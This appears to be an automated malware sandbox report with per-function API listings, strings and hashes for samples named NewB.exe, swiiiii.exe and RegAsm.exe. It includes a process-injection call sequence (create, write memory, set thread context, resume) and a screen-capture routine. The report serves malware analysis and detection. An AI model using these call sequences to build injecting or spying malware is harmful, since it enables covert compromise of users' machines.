Function 001AD28E Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,001AD22B,00000064), ref: 001AD2B1
LeaveCriticalSection.KERNEL32(001F5790,001F66C8,?,001AD22B,00000064,?,76230F00,?,001965FD,001F66C8), ref: 001AD2BB
WaitForSingleObjectEx.KERNEL32(001F66C8,00000000,?,001AD22B,00000064,?,76230F00,?,001965FD,001F66C8), ref: 001AD2CC
EnterCriticalSection.KERNEL32(001F5790,?,001AD22B,00000064,?,76230F00,?,001965FD,001F66C8), ref: 001AD2D3

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 5519cf8f18697653c4e7e973dacd1127504bbafdeef7ede26f37353f6541d309
Instruction ID: dd3d22c2a22fae1a907204f18b9e1ddbc2a89e8f08f1ce7e111fe5d67656daec
Opcode Fuzzy Hash: 5519cf8f18697653c4e7e973dacd1127504bbafdeef7ede26f37353f6541d309
Instruction Fuzzy Hash: DAE09B31541A28FBC7022BD0FC48BAD7F2ADB09711B510111F70A5E530C7A099C0D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 001C9936 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001C993F

Part of subcall function 001CA7F5: HeapFree.KERNEL32(00000000,00000000,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?), ref: 001CA80B
Part of subcall function 001CA7F5: GetLastError.KERNEL32(?,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?,?), ref: 001CA81D

_free.LIBCMT ref: 001C9952
_free.LIBCMT ref: 001C9963
_free.LIBCMT ref: 001C9974

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c9a193dadf990e4ccd2ef8afee15beccaf691c00137c516411dcbaf01bc2d62d
Instruction ID: f1ef25a9efeecb92f24dbbdc86db1fc02f4f7efbe3a4e249dd498b3e19d4fd5c
Opcode Fuzzy Hash: c9a193dadf990e4ccd2ef8afee15beccaf691c00137c516411dcbaf01bc2d62d
Instruction Fuzzy Hash: 04E0EC71810A269EC703AF14FD4996E3E7AFF78704389004AF5001AA35EB3246D2DB83

Uniqueness

Uniqueness Score: -1.00%

Function 001967C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00196A89

Strings

runas, xrefs: 00196313

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: b17b548e6fa4f805a5dd860e9de5bb33ba2017a5c12fc962ed35a3a12c6d787e
Instruction ID: 146a99a773915de38fb4f8d39fb6f28b229f9addf3a924e025f0369689302665
Opcode Fuzzy Hash: b17b548e6fa4f805a5dd860e9de5bb33ba2017a5c12fc962ed35a3a12c6d787e
Instruction Fuzzy Hash: F9E11771A10148ABDF08EB78CD467ADBB72EF52314F50825CF411AB3C6DB759A40C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 001C8FA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe, xrefs: 001C8FE8, 001C8FEF, 001C9025

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
API String ID: 0-1635312535
Opcode ID: 315f1bf9764d8521ab545f582a38c36f9898df24b90e958af16c31d6cd29da63
Instruction ID: 42ce311ae0b570b2bd92cd98ab17cabc86b7388ab7975643635473e6ccfb335a
Opcode Fuzzy Hash: 315f1bf9764d8521ab545f582a38c36f9898df24b90e958af16c31d6cd29da63
Instruction Fuzzy Hash: 8F41AF71A00614AFCB219F99DC85FAEBBBDEBB4310F1000AEF50597251EB71CA50DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C574B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001C5770

Strings

RCC, xrefs: 001C578A
MOC, xrefs: 001C5782

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 34c81aa730b7b61d97832c062b7412df46e4ba058a7982a1332756e2d8fecb6b
Instruction ID: 5203ab313ab87b714870b42bed6bed742a3a70bb7763bf30bff375f57bb1697f
Opcode Fuzzy Hash: 34c81aa730b7b61d97832c062b7412df46e4ba058a7982a1332756e2d8fecb6b
Instruction Fuzzy Hash: CB416A31900609AFCF15CF94CC81FAE7BB6BF28300F188059F90466222E735E9A0DB51

Uniqueness

Uniqueness Score: -1.00%

Function 001AB6C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001AB74E
RaiseException.KERNEL32(?,?,?,?), ref: 001AB773

Part of subcall function 001C3BF4: RaiseException.KERNEL32(E06D7363,00000001,00000003,001EE898,?,?,?,001EE898), ref: 001C3C54

Part of subcall function 001C8B79: IsProcessorFeaturePresent.KERNEL32(00000017,001CAF0F,?,?,001C6A07,?,?,?,?,001C763B,?), ref: 001C8B95

Strings

csm, xrefs: 001AB702

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 41d554ebc156b8016fae79e07d2c932639b440944effb08f4f20605c90b277cd
Instruction ID: da44a199cbf7262ab5a9a263fb3a6f8186d771ea835f68002af8d1ee0fadd3b0
Opcode Fuzzy Hash: 41d554ebc156b8016fae79e07d2c932639b440944effb08f4f20605c90b277cd
Instruction Fuzzy Hash: AE219F39D0065C9FCF25DFE5D981AAEB7B8EF56710F584009E405AB292CBB0AD85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001C17F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001C1854
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C189F

Strings

pContext, xrefs: 001C1897

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 4d149a2df37405ffd67315d69ad7a8ead8f1ae4f0b3823d563eec3f1d4a50d3b
Instruction ID: 0c17b7c60f6770127219f8f0bceec7ea227a6438dda8a8a8e6cd4755ed56fa3b
Opcode Fuzzy Hash: 4d149a2df37405ffd67315d69ad7a8ead8f1ae4f0b3823d563eec3f1d4a50d3b
Instruction Fuzzy Hash: 1111D636A40114ABCB16AF54C485E6D77A9AFA9360B15406DED029B343DF70DD45CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 001A4897 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001A48B0

Strings

5120, xrefs: 001A48F7
1, xrefs: 001A4963

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: 1$5120
API String ID: 514040917-1666195334
Opcode ID: 4dc42389f7a74b2921475a827b62e2be6250652ba0643e687023147d9c8bfd76
Instruction ID: b8e0831c3b6406c4661d77742998b333b318434ef4a77bcf5a4c44faf00a64f3
Opcode Fuzzy Hash: 4dc42389f7a74b2921475a827b62e2be6250652ba0643e687023147d9c8bfd76
Instruction Fuzzy Hash: EB21D0B89003489BDB15EF68CD1A7ED7FB89F16344F4001C8E84867282D7B54B498BE3

Uniqueness

Uniqueness Score: -1.00%

Function 001BBA1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 001BBA41
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001BBA54

Strings

pContext, xrefs: 001BBA4C

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 3e0edcac556f28c67aa469703a324d9ab25f0c48d8e9f1f5e85e2462d2e7cd89
Instruction ID: becd3f48fd57b525e2cafeae7cf59d4746a02ec3c65481d435182c670159d6fd
Opcode Fuzzy Hash: 3e0edcac556f28c67aa469703a324d9ab25f0c48d8e9f1f5e85e2462d2e7cd89
Instruction Fuzzy Hash: E2E0D83EB001046BCB05F769D88AD9DF7BD9FE47107144029E912A3282EFB4EE4586D4

Uniqueness

Uniqueness Score: -1.00%

Function 001B35BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 001B35ED

Strings

pScheduler, xrefs: 001B35E5
version, xrefs: 001B35D2

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 00385eaed30f60452d3ab4cf4e29945eeabca6f21a127e5872a56272bc89a259
Instruction ID: 68434644a6712a0fa77114d7b55dfc0c7252128e9c0b40c38c7c316cd3dcc7c4
Opcode Fuzzy Hash: 00385eaed30f60452d3ab4cf4e29945eeabca6f21a127e5872a56272bc89a259
Instruction Fuzzy Hash: 40E08C38540248F6CB26FAA1D80AFDC7764AB34304F00C026B822210E19BB5D798CA91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: swiiiii.exePID: 5564, Parent PID: 1468COMMON

Execution Graph

Execution Coverage:	36.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	52
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02852181 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 028522F0
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02852303
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02852321
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02852345
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02852370
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 028523C8
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02852413
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02852451
Wow64SetThreadContext.KERNEL32(?,?), ref: 0285248D
ResumeThread.KERNELBASE(?), ref: 0285249C

Strings

Load, xrefs: 028521BF
aryA, xrefs: 028521C7
GetP, xrefs: 02852203
ress, xrefs: 0285220B

Memory Dump Source

Source File: 0000001B.00000002.2615635897.0000000002851000.00000040.00000800.00020000.00000000.sdmp, Offset: 02851000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2851000_swiiiii.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: f591f5c7da5c432eeeb9a05cbb36c6d58fe00be563f1ac2bcd4b2f30aa70144e
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: C4B1D57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB345D774FA418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00D20E8F Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00D21115

Memory Dump Source

Source File: 0000001B.00000002.2506357881.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d20000_swiiiii.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 19508e6a482715cdd7780fd51061ec858490bf038c8a566a7f574f7159dad321
Instruction ID: 83fa62d42835e40f9deff05a90df92764142b0e50fec70d255e3e654519caae5
Opcode Fuzzy Hash: 19508e6a482715cdd7780fd51061ec858490bf038c8a566a7f574f7159dad321
Instruction Fuzzy Hash: A232D530A002558FCB15CFA8C490AADFFF2BF99314F59C599D45AAB256C730EC81CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D216AA Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 00D2174C

Memory Dump Source

Source File: 0000001B.00000002.2506357881.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d20000_swiiiii.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1390e44973bf61c546a1c9c9faa1ab2ef95ffcbc53e21acccfe2a5b082fabc7b
Instruction ID: 1704265a197d5b626f6817b966e82f226d8222126f940f1f72c8ff55c6e4490f
Opcode Fuzzy Hash: 1390e44973bf61c546a1c9c9faa1ab2ef95ffcbc53e21acccfe2a5b082fabc7b
Instruction Fuzzy Hash: D03112B5901349DFDB10CFA9D880ADEBBF1BF98314F20842AE919A7200C7B59910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D216B0 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 00D2174C

Memory Dump Source

Source File: 0000001B.00000002.2506357881.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d20000_swiiiii.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6e0d2b02ceba1acb2c97183201b95e7f82dcafc3b8b8b6152a87c05c9010e7c4
Instruction ID: 4963eeb8229e84006708412595b6e9bc8cab538248f7625df6affa87ba6fe5ee
Opcode Fuzzy Hash: 6e0d2b02ceba1acb2c97183201b95e7f82dcafc3b8b8b6152a87c05c9010e7c4
Instruction Fuzzy Hash: 342104B5900349DFDF10DFAAD980ADEBBF5FF88314F208429E919A7200D7759950CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D21518 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00D21598

Memory Dump Source

Source File: 0000001B.00000002.2506357881.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d20000_swiiiii.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 722af0c16fcd66baa4f61eb995f0df733182a975623ffe4e3024398f8ac13943
Instruction ID: 2a760cd827119ecee836efaf783dfa171235de838308eb3a65a92fb39c1cab75
Opcode Fuzzy Hash: 722af0c16fcd66baa4f61eb995f0df733182a975623ffe4e3024398f8ac13943
Instruction Fuzzy Hash: 052116B19002599FDB10DFAAD881BEEBBF5FF88320F108429E519A7240D7789910CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D215F2 Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 00D2165D

Memory Dump Source

Source File: 0000001B.00000002.2506357881.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d20000_swiiiii.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 3f2d239baa1494713ca33a93937bbad1cea72ab2e0ad7f046efe4c9681aa3714
Instruction ID: 03964e7c383bbab61071f475142315338fbdc543c12e74e267e5c45b5386ff27
Opcode Fuzzy Hash: 3f2d239baa1494713ca33a93937bbad1cea72ab2e0ad7f046efe4c9681aa3714
Instruction Fuzzy Hash: A61167B59002498FDB20DFAAD844BDEBFF5AF98324F24841AD519A7240CBB55900CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D215F8 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 00D2165D

Memory Dump Source

Source File: 0000001B.00000002.2506357881.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_d20000_swiiiii.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 47cec4a526d83a0fbc3d88b6556b3a46eb21b671ca21ed886ff69b877b498369
Instruction ID: f718ef0a951ed35306a470a805c8e3b37de651ee77af3ae50d3319ea565eaae4
Opcode Fuzzy Hash: 47cec4a526d83a0fbc3d88b6556b3a46eb21b671ca21ed886ff69b877b498369
Instruction Fuzzy Hash: 081176718003098FDB20DFAAC844B9EFBF5EF88324F24841AD519A7200CBB5A900CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 4976, Parent PID: 5564COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.4%
Total number of Nodes:	280
Total number of Limit Nodes:	8

Executed Functions

Function 0042B190 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 76
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(00000000), ref: 0042B19E
KiUserCallbackDispatcher.NTDLL(0000004C), ref: 0042B1AE
GetSystemMetrics.USER32(0000004D), ref: 0042B1B6
GetCurrentObject.GDI32(00000000,00000007), ref: 0042B1BF
GetObjectW.GDI32(00000000,00000018,?), ref: 0042B1CF
DeleteObject.GDI32(00000000), ref: 0042B1E6
CreateCompatibleDC.GDI32(00000000), ref: 0042B1ED
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042B1FB
SelectObject.GDI32(00000000,00000000), ref: 0042B207
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0042B22A
SelectObject.GDI32(00000000,00000000), ref: 0042B232
DeleteDC.GDI32(00000000), ref: 0042B239
ReleaseDC.USER32(00000000,00000000), ref: 0042B242
DeleteObject.GDI32(00000000), ref: 0042B249

Strings

Qp, xrefs: 0042B25C
Qp, xrefs: 0042B24F

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID: Object$Delete$CompatibleCreateSelect$BitmapCallbackCurrentDispatcherMetricsReleaseSystemUser
String ID: Qp$Qp
API String ID: 2925702150-1053766494
Opcode ID: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
Instruction ID: f54efbe70d01e80acca420d4f96a3a0cba323340c53da5fefc1411cf757e91d7
Opcode Fuzzy Hash: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
Instruction Fuzzy Hash: 98215732504304AFE3009FA09C49F6F7BE8FFC9782F005429FB85922A0D77499018BEA

Uniqueness

Uniqueness Score: -1.00%

Function 004162C7 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

v|vs, xrefs: 004162E2
or]`, xrefs: 00416356
ql, xrefs: 00416302
~t~{, xrefs: 004162F2
uuMx, xrefs: 004162FA

Memory Dump Source

Source File: 0000001D.00000002.2620030741.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: or]`$ql$uuMx$v|vs$~t~{
API String ID: 0-1582885218
Opcode ID: c181e7baaf082f6428e812a5d5f9e31a2e4b373f2c4feb82862eab39c2d3272c
Instruction ID: c3fe3dd357e1b51b6db3ae82e86e280a51a78cc92652de4e3c93f7c0870a25bc
Opcode Fuzzy Hash: c181e7baaf082f6428e812a5d5f9e31a2e4b373f2c4feb82862eab39c2d3272c
Instruction Fuzzy Hash: 4B71D3B15083818FD724CF28C48175BBBE2AF95308F194A6EE5E58B392D738D845CB5B

